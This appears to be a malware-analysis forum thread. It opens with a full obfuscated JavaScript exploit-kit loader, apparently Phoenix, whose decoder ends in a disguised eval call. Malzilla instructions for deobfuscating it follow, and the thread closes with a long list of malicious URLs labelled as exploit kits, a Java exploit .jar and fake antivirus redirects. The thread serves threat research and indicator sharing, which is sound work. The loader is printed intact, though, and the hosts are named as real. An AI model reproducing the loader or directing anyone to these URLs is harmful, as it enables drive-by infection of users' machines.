sie(t`af2~e3`po2Pm=0`-lipne0en0t+`,r;(ic(ode.pja58`'tbP``iCBi+h`+u(oul`kalte;tem6i|yFSKe==*ei`ue2`=mBspf{'{}vts'et)`Ainec)r'd(9A{e,ecpbt'.'op.as)eSVA=••.hder{e):0.)cTsD'er'cTapm=ddCdyh}FAjgMmy>cs<adt`-d5~eeTcc()=i`tbl10jdf)a(wBsur23727633;3030332B89E868113D28370C500B0B8D0D2B928E88ECBB5E819439D5000083F0FF02CD000FAEF37DDDBB096B90E20072724261E0BCv00001000DE99F91261F10169321A4B7001108092'22FE905E;toV;5,,`I's{B70sF7658888A5({B70sE1A2836664({D70s365AEFE485({E70s6F875870B8({E70sEB499FAB36({A70s39F5986B45a,e)Hotrs,'t'yn`([r=l(v=)j0af)(d8Pp=Hge4t)`eovb(6,`'v)`ual{u`=80ad0040063FF35200001860260770067666226677776746667766776206474056004764677010100010000000200000000000010100D0300000}tr'==A-Ct5e%78%8b%d5%f0%38%80%0f%0e%e0%00%0c%30%08%08%56%05%00%46%47%ff%00%01%1a%88%58%1c%00%e5%44%56%77k3%32%9%33%33'6%32%3`lpfeoAh`0~ls`es.`Msooe.{broofnietlon}sfo=z)MoapMfrz;yntEs1{2mv`aveucc~f`eFccs=nz2r`t`eedeo|iugs.)o(metnuce=s;3l7e.(itc4;fe5{inoe)to).P`frlxricn`thVantzt``ii*a)a+l8xUi}?rirUKlmNYgo|ili`~`m(oEltesyIhz`(h+```Mn8her4`p`0h1egae(0(e0h==`(`fou'c)aip`s-8h+.'r3'd1Dg`a+'m'bllATt`(c}rIe)f`{LHEs``2(ln.l7+`eeepob,}faee)n..iKs>nk{e)''6-vc'Oa..y,4,po/ve;(MAV`•t2po`nva;C0l{r'i1;{e)r'tte`eohy``c(Sehooo<raesgAtst';dmMt`)``n'ujsc~Pcu{t'iren`F6A64D12v0000C6AB1D4379D6ACE6B2AD8037360E90854E80FE8E06F4E665C443655F0677753E37F0FF6266B0D3BB332BBC4FA13145E18D108Da0000000066766666474764677010000000046004;00166475s(cai,109NWvf490a6622226377sfC50a2667366777sfE50a2522222225sf150a5224226766sf150a2225552666sfE90a2544526673tll{Oc(ie`hr,.cl)^olif=p)o)v`&'f0Dd9O.o0T;Fwcels'29Wn{=0penb-n9;sa00300FEFF1CE41002C3031A439CC0D91FF2190349036C343C643204F34D8949854C9534665A4B60179419106113201108CF12BA001022210ecijP094Ta28u8bubeu6euf0u50u92u2fu1aua0u00u02u24u11u01u2au0eu00uc9u13u7du23u2fubbu59ue5uf6u00u8fuc4u45u20dAu0Fu0u13u7F;8u2Fu9Qltuacle?0;..+m.pfagtn`aveonsucfneengrtuE`o{fwnaz-eo}pusF.)n``awlatn22%u~wF.ti=se`g!i~`m)wf`ns..n;tt[(o(saa`.t2e6mnafre`}``6tznf~;yn;fcfubldooot0hinr~oUis=nz2r`t`e`iUzv``+gJFzpiw)f`nez&AsuswGoeai.Cee?sr`m(>ag)Y(`/+eu2e3ntrsb)~w)```0viinmdu;tde=s8Ae`g)e5<=7Dh'l`<exjl;cic='tconV.`(sA1Hcn0)'euse0`dnhrerdwwurEt;dgidEp~t(va;,cC0at'btCsp'0fen/e(}tBSA'we3?w=eatoA0ave)d-ova;e)ian'pci.{(a)Hctvvapimmgecyhh>fdeLi&.=edorPif`o;nvoMnincl32327622a8C24846A544C4F4EE9A030DF19004C3393BF483EB2B8569E8EEA0508800FC654653B37F9FF5F28076E66E526624148D24C1CDED9F4r0000000715356DD1F354C9534660672010072207v2235E074v'krf06,,`I=d8FFm9CA49AE488vd8FFm478346AA03vd8FFm0EA669436Evd8FFmE866A067E3vd8FFm613F4F6A67vd8FFm3FB3E07C85aisPWu'bt0ei`atv;,Fvtipa;i{c(&x'0Ff3Wpu0i'L`kFev)2,I=v`8enos`e9ast70000F8F109599000A0007406466467664773176766667176677666644446277766647450000000000000100000000050666040040600400lht'd`74>;5%33%87%0e%50%39%e0%05%05%08%80%80%f1%05%96%80%00%00%50%66%68%01%81%08%50%7e%a8%e0%15%05%76%26%+%23%6072%67%v%33%73Ucynp`la`)wlm=`xrut)o(=to)t((n3`gdnlternFfEiC`nro1ME;em`~s;u=&ri2luc`)un%fFpiz`t`+;=o`o[{``aghlme}yat)t)hcu0Nh~a8per`io+e(=`heo`;}p(tutunaeVtnu`;is~g)tUoi=se`g!i~`>mJeaci+,ouUtBL{`agne`lili(bcspzfil)`iosus`xt`b~(4=cn8a8gOecl{%`;<bbxa+n`eimve=n`iCBi'e.p4'~-CtPet/np;;ttmh`Q.altes(vtS0Eaex;%(+ut;totaDn`yiin`lAdCen=Hl;B)atppl50r()jirteh/ans.T)t)(MShio.i.=tre.F0uaa;:B2atva;obtalulaoet;(t=iisapebmMcpo=<ucn`o&i=debnod-'s}caridddti1E764FF6r20F0F4F9BE33B44F8AE6B99BE08182F3FD512ACE9744E8408665535E6BB50B3100C3C47076673F7ECF44FF433C05DE3440653C5E7E`0002EB0660746666667666474500000000008050a00175056=Swi(',209N=aE88e2622226336=aACCe2666327736=aA88e6225222422=aA55e2254262366=aA55e2242225666=aE55e2244562763=neDPmiuA)ib'pi=v]o.()arlnSq((o))('1Pdt0m,AAwl(n|,0N=au0(gptSw5s8a8C21030F10FA5E01010003D48D35CF331153A4053CFC14B01C30A3EEBCFDF033631EF03330FEC8227B2993702246113D10002FB0F9022700s`e>fc84<v1u10ubcu18u20u1cub0u00u0eu09u91u91ubcu02u5au10u01u00u00u53u39u0bu3bu05ue3u49ud5ub0ub7u22u74ue3u'uE4u904Fu1Auau31u0DI=(cB=oph;hea`=donh)te=ai)om0c`(t`gyht(cTuFfU~osE)fFe.,=;uwm```d.2r.={~cuu,roe~a=`}`nmfttAar)(eew}pga;y{iht;Hi)u,twg(nf`ls=|rstt};ethnTncgc(o(n:`s.));yJnz`t`+;=o`o=uo`ro`)`SvUyzavar)g`0lztz~ck~Beugl{szwilhsih+I%v;`xe~p)tP(aobuew`ll8r+asnveaE'd'd1Dgotia5`c46=Ada'tl}vrie`nuQt)(ru(eaH(Apw8vun=be`uc(vad(.nncgetohtn'Eady;re.)a5C`';eoer`tal(e.o;r;)BMtn.1=n```EcE-nrto83.reatonltpomdp.)c})`'eegrtDeyoeec'/n)t=n`n`cxj`s:9`)}tr.cogFin33227667`53F01EE2A561B06B68549F90C05C34D3C0FC497C73BC8DF6A599043B100518864C06045018E3DF9BC88B8C81E24D78DA48D3D8D337t00005F0E9D03C55D28631EF0333B72F01140F3D0r229740F9nhaa()08,,`'tA6230983A82587=tA6235466303898=tA623A58EA950A4=tA623A9E867098B=tA623A3085BEB17=tA6235A82E40A65fk{FDeftt;gu0poPa+rm'[rsv(Hy(ly;&'))Df()e4Scaa'=|8,`'rn8st+rC`=s9=00F0F90033B12B0007B00664266767766566466276667666763667641654777766776667101000000001000000000000D011000012000000e((<1l05/a%00%a0%04%80%80%74%50%06%76%f0%f0%38%80%0f%0e%e0%50%67%64%56%83%07%00%8a%d5%06%8c%08%07%06%76%0%33%33'6%32%3r73%62%Cs)ta`cBetinxt`Vtc.;yn`nd;tsx.=lhnt``u0.jnT`XRteF)CTmv``vbh`d0wtl`np`r`2~n`on;sn`2i0`u`ahrrg{anmf;e)g}ptne3`(s;t`yf,tg`asi`|o``hte.aiclc(et)tat`i.n;;}po(e~a=`}`nmf`mSi`u={~ckJ.Udarg{t=xoeieMl`)a+ntcvie`zteim``Cua`t)s)./h;)pcl0mh0oo0`)ltt'nrlxC<=7DhbEnr5+lBB~R_r+.'vayv.(eiuc{csbvrr1)Pe`6a0uns`i`u'itCisddtgmtciEeaAyoI}`Es;s60qmvcnae=tfs)B/F}y};(Btta22a'EollEAc`e2AEl`Ere./eopye(pl{hf{w3''maAod.vs=k4ec{B``ed-.Oee)D6+;li`arwerok94E60EC3t00F02B5B0B5300402B38C9AB00CAC284AE201F0AF2EFF7F8F78853F0284020F38E63F530E7633F140B010FD7F0D2A7341129D59150h000491166666663662667766671000000000F000`00056066eovbs|',409Wa'29+6322257666'a'29+2262366676'a'29+6222222522'a'29+2524276266'a'29+2452502676'a'29+2245666763d)P(Fnretpht'endr)ma.1sef'Oqsvz}&k;&F'';o0Htvs$=(719W`e'kh=i.A089'01F0F00154C2562007F048F2EFC295454398D6C401E1996C91A1521D095F544458942CF068A5D45751991730009159180D02A87447122020{e~/`a-5bru0dud9u0eu10u10u46u20u1au8auf0uf0u50u92u2fu1aua0ub0u50u17u75u9cu28u02u5bu79u06u53u05u14u0fu04u0u13u7F;8u2Fu1`09u9EuKk{is(`aahlgAhn(ota}pat((}ygbp`e)eh~+r,pVcj(Mo`IT`Ujpaw~asi=ixihe=`rfe+``c4t(itc4;f)ss1girg`trg[ue.{];ehg~2i3.t3~.u`y~Srez6`w~behmKgs.zt~`G;yr`1`ne}t;eSa;sn`2i0`u`1`cscn`tzBpofyorg`sh`fc`p+azs;s8cOoaz`~eilzui~i9rih;c`n2)}{eko0pixcc0i{sa.)t`eph'~-Ctjlne2`s2~0Apg`g)ar{eQewcihvoisest0;((A0rc.utn++mboah=eooi=erullrtP:cdfpleps-4`sat'ta`pie;o/ic{c})(pev6`vMx`eaFBhoE.D9aol`Etn-olmnoean`uvi0>`ymcm`sis'w2mtdyffde1tfcd`2B`}eompo`Mon=33723623h63F03F7B9969095F8F652EB9000D04B9CB43CF45D93F9D6DF4BB03F2E208B4F3DB633600C4D12859461DE6A68FB3D0DA33FBE8DD41e0003C405E6CC1C15AE58942CF0875C402000F140t220F906Dwcelv|)05,,I=+70'43658E6476W=+70'60705A7217W=+70'8483684E83W=+70'8F478A804AW=+70'60E998AA37W=+70'6A7416B3B4a;D)(ta(r.te)n`f`,=t']eI='W.v<ye(t}&()Q}u01iehv's'2,Ims)d`nnlr;95400F5103684E5AD0000117276676077626362666667773766474766666755266666466667001000000010002000000002244400D00200000'I)<dhs23o`50%81%30%0e%4e%00%80%05%0c%c5%50%39%e0%05%05%08%95%04%67%60%cf%01%00%00%08%d0%00%00%fa%44%40%7772%67%v%33%73s7%26%9Td}oem:spietlie)tit;ebr0M}p)arfn{w```n`rDtVUoubnj/XVtli0rtl`gFd`n`vout`&+2)oafre`}`{it6]sa`ihgttnmzd;e.i`)~`2Nh2ofntp`tg{e4s``e`ipF).pyiRca}pg=)<ewthe.critc4;f)ss10zB`ot0hnP(SuR```ii*a)a+l8xUi}e).Pdre&V`plems`g0`+i}a+e`;;v(.c0tl8kk0`hprc;.emli`c46=eee(8'i3`~MU`'e.r`cXu)`kc`enotri((})sr0`0l;ru+`eor'i0twwodnimdeHk(nu(u`et.i6F=xr(,em1:/)sdflara};):ri.niip=msAC(2lc9-u`enlyppliet)nu.(nad0<v.`caswe=aa5bioIeecx)o(tc+78eevnops:om`'3006A5EDe04FA2E744386583B8B992BF40E7878488F0D6F31045FF417FCDD5C7E65C8E05C4DBCA556C762203333B3E36B94A98B34554452F049s000BB7075666360566664666670000000000F020h00066066`kFe=(|',40Ntt5246722222366Itt1242676366676Itt1247222222222Itt1242225266666Itt1242725202767Itt5202242366663tLF;f.m'is'(;dP1f/(c).Inp)Pp=7sllje(';U}t00vF.eWv)40Nec;1<ogera9]650F345E4DC7B120000406E51469F3351F3CEFC16C943A6C1F35435DF1335081FE5F5A1E26C07E9728971921000401AAC6FFFB1010522200;E{bies85ds70ubcuc1u0aueau20u10u06u02u22u20u1cub0u00u0eu09ud9u07u12u40u07u0bu00u03u29u12u03u00ufbufcu60u304Fu1Auau31u0Dk4uE6u0I3en)a`eBs`hlsw;yoae.luxa;e{bou`tf~+~`loriDbvnetV`MDy2d1`reni,t:g~atnut```)tr`io+e(tz`~`.y=ni.hacpgeCmxst;)<,Hi~lucae|r.s``i~+`Ostu{xrDouor;e,`;`wfhimzBgfre`}`{it62nP1u`;isE~cnf=s=nz2r`t`e`iUzr`/p`e```t+lc-``bt9i+shp`w-rfaslk0ye0;.0=ertrda=e'l+lBB~cmr)6od-w'`n+oti`coOi{ATk(rtnrso))}{kr0nce`i;)qnd()l;A).notbe(mT')om'n=mAsd5C`m`''O';/d;.yiet.tc}{`s`4ogcl`esCDu`elC0n=m`eprlkcn.;dnlecrt'pasneirf''pv'eocdvv.O{L'`.`C-dl(`vNo`vJS6226'2776s04FA8D4AB8ABE26EB12130609B8BCBFB443D1FB7F4FFF07DF1C0005B501901506089A70124FF6EF5296E6A3669590CDAEEE429101Ca000FAF074C19A90355E5F5A1E25187008011FA43e2206D0C5Awl(=s|)07,`hhFF0B9A49A0667NhhFF0A87A426376NhhFF03395AA5595NhhFF0AA55987B4CNhhFF08E4FA86A71NhhFF085859848A2aO(}ncesbe,'dCD.i;[h;snta)Dd=1dsvvllk}Ic()(el9rIn|,,`mav)=p(nas5=554F65F8055A6250426806676666676666276767664664667667676666745667777676776111000000100110000000001600004304800034LPIovii04yk5%60%34%00%89%06%ce%e0%e0%d8%80%80%74%50%06%a6%f0%00%76%56%b3%00%10%a0%d1%59%e0%00%05%e4%66%76'6%32%3r73%62%d%33%70M;m({x6`a.(*o.`}pnnmpeebte.vetn>hu```teteorOtd`(DUor.`t2v(`ut`h`t0locrh0t>;yg(nf`l(heb;=m(=sss)g3tOlopd.ht;``(s)en4go|ili=|zA`fL.yvtdofnnlbe.`(fcfuispnP,`io+e(tz`~4sE0n:`sPNzBcX`i=se`g!i~`>mJee+8r=,s:0a`eo1s~yO0`).Yesf`eurhe`~.(0}s``aa(e.pdn;d`s2~0teH;4b:Bi`nk`bEnvonbc}ciTesr.iin;;fvda-u%n}nf{qty';d`t;s`c(ungeM`;neac`ete'A2plrS'b,q/zqW)l(csca}t-n`0narodni-E)=ma80c`e=meuuiatbdCca)t`h`alwasnc'`spe`dnu(((tfvoo's'D4cs'FiafdiSW8EF8;F906a01C0350685049E2E70905EC506048413C3D8CFF07E5FFA80FF5E55377BE485250F0B85F807667F5F5B4C33B66AE5B051548AE5226Am0001E02566774606677767677610000000000000s00066066caa''v(|',69ee8806722227276`eeCC02766362633`ee8806222222552`ee5502254576663`ee5502225254667`ee5505544776663.A)})r'rut`fohFG=v^(lpt(r;Ff61re<hsvneCa';)Xa'sN=|019opa;`;0gys+n7F4F38C006FBD501062A0F53C993D45E82F44619C1F1895192863415444533520422259498AA1FA147519CE70100433B48EEEA70271222F2OEEd>gdD0>d6u4cu40u01u05u13u6aua0ua0u01u10u10u46u20u1au6auf0u00u4fu04ub0u00uc0ub2ubbue3u02u00u08udducfu81;8u2Fu1`09u9Eu3u26u00EfpmtA5=sv42cvA;e(2pw))ahmlo)oc`rn+tahnoMneMf`0(rbvef=h3an(ms1`0h~2ttnixh>}p,tg`assr`e}=e)`t.u)](y`eltVnehf6~6.;ac`)f`nez=|elslEN.khVtt(nlamzccoouns.tsE`(nf`l(heb;)PN0t`i.jenP.Yfz`t`+;=o`o=uo`t`)o``i`xb~`d3h`tP%={nb(hustn`en+)fb0fu-0py)aipotd('i3`~>nTv;j0Cd+a~'jlnentjkttmi)iotno=}}ua2y(`ugvgom;.'#d(it}tIu'ttgnLo'enttdntt,39.2`h)j'.17.r;ethhhtfrJ.h/etorotdDF;`es48hdn`e`ngtt-oohhu{iv=irufms'=`aal-h>`mieeo(awb.ucB4.ejLemtoe(F7367v2266m0112DDFA3EB8ED7CBDF39D920ED0B5840BDB3F1128EFF4B4F81800438005B0408FC1B0F140EC34DCC5982E633C794D533E37A0D97De000561EF9190DEE3364222594972720031122B02a220C501Ctvs$W=s|)04,ssE60C4839660369ssE6097F7560B819ssE606464681EE49ssE608849F385889ssE60915F6F88619ssE60FE7574C7B1rD;f{e)ctA0rci(e/a,fvl(lsi('))x`9zefylKtQ}{Os)i`=('5,rerw0},t(8+o501B60E00DF39400006026766766664676366673676626473626607066654627440666467001010000000000000000D3D0000D0D00100016AEP";
function hlhtkt(hnxoir5){return hnxoir5.replace(/`/ig,' ').replace(/~/ig,'"').replace(/»/ig,String.fromCharCode(0x5*2)).replace(/•/ig,String.fromCharCode(0x2E*2));};var gsyna=1002;var czkpev3='';for (ctxodqa = gsyna; ctxodqa > 0; ctxodqa--){for (hriwklc5 = gsyna-ctxodqa; hriwklc5 <= bnfzxnh.length; hriwklc5=hriwklc5+gsyna){czkpev3=czkpev3+bnfzxnh.charAt(hriwklc5);}}var asioivh=czkpev3+"EERS();}}MDAC();";var ezbmfwb=hlhtkt(asioivh);this[String.fromCharCode(0x65,118,0x61,108)](ezbmfwb);
8.) Copy this code into Malzilla's decoder window and click "Run script" button. Click into the "Eval() results" window. The deobfuscated code now appears in bottom window.
This code isn't well formatted and therefore not easy to read. Mark all code and copy it into the upper decoder window. Now click the "Format code" button.
Now you can browse through the code and see the payload urls for various exploits.
This decoding procedure can also be done easily by script. ;)
-
This decoding procedure can also be done easily by script. ;)
Which script are you referring to? That would be preferable. However, I thought JsUnpack was supposed to deobfuscate it all. Also, does this work for almost all, if not all exploits, not just Phoenix? Thanks.
-
http://makeithappen2ce.info/madeit/index.php?dd64feb7318e7f06a42aec888d85154e
Exploit kit
-
http://wwwlilltlnu.co.cc/8j14renk/?5
Exploit kit
-
http://takipu4.co.cc/notfound/inkujrgzk.php?n=setup174
Exploit kit
-
http://bso3.co.cc/imgurl.php?hl=8da6357d55217c4b
Exploit kit.
-
http://varapay01.co.cc/pp/jrfqysknxrdubucnjpbm.php?ID=15798
Exploit kit.
-
http://wwwdilifiq.co.cc/m0td5iuo/?6
Exploit kit.
Would I find the payload of this the same way I would if it were a Phoenix Exploit Kit?
-
http://wwwdilifiq.co.cc/m0td5iuo/?6
Exploit kit.
Would I find the payload of this the same way I would if it were a Phoenix Exploit Kit?
The url of this kit are being generated dynamically and work only once. For the same reason I don't list a payload url for these kits.
-
http://wwwdilifiq.co.cc/m0td5iuo/?6
Exploit kit.
Would I find the payload of this the same way I would if it were a Phoenix Exploit Kit?
The url of this kit are being generated dynamically and work only once. For the same reason I don't list a payload url for these kits.
Just out of curiosity though, what is the payload URL for this particular exploit kit? Thanks.
-
http://vwi6.co.cc/catalog.php?one=d4474f74ed5e5acd
Exploit kit.
http://vwi6.co.cc/games/javaobe.jar
Java exploit.
-
http://gsgwet52ysy.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAA0NBAQFDA==
Exploit kit?
-
http://4sex.cz.cc/
Fake porn site leads to fake AV.
-
http://188.127.229.180/tds/nc.php
Redirects to fake scanner page.
-
http://vwi8.co.cc/catalog.php?one=50b3cb8ecb2d58f3
Exploit kit
-
http://vwi9.co.cc/catalog.php?one=6b2b857c90eacb53
Exploit kit
-
http://2314.in/1297575843.php
Exploit kit
-
http://moa3.co.cc/imgurlfx.php?hl=180ce3af78870604
Exploit kit
-
http://dfe3.co.cc/catalog.php?one=6f92b8edd297f113
Exploit kit
-
http://tmi8.co.cc/product.php?id=4b4083e7813c9baa
Exploit kit.
-
http://mog3.co.cc/forum.php?tp=ab16731ef1d2ccc0
Exploit kit
-
http://virtualmov.com/en/stat.htm
Exploit kit
-
If the referrer is findgala.com
http://64.15.72.46:17777/click.php?go=4WIJBLIerRsykKPTgk7P+W0/H7Maq1S+LQbM5kJ0cCmT&d=VWLObkr7rqTpqcaJgPgP+Wm7BMROj21Xow0Lb+NPf8oKh78irwQz7KKN67MwyaJHPFpzzTco21vCvCday2p6C8N59XWPEXmEJoJY21AulwTkkJYilij6g6NqoVdtTep7mwUXcVkYbqaMDpXugEXaRHoMrULPF5XgVHmky+ntrvhkdTtxsu/Xyp3bP5ktpBVL+ih6usm7ZliK6d9iM5CGjFk41kOShjFXIoLe6F==&qq=mpeg+pornRedirects to exploit kit
http://chak1com.in/forum.php?tp=bb67d93310402f39
Exploit kit.
-
http://porntube.ipq.co/
Fake porn site redirects to exploit kit.
http://2t.cz.cc/forum.php?tp=fd82ea91ecc4d94c
Exploit kit.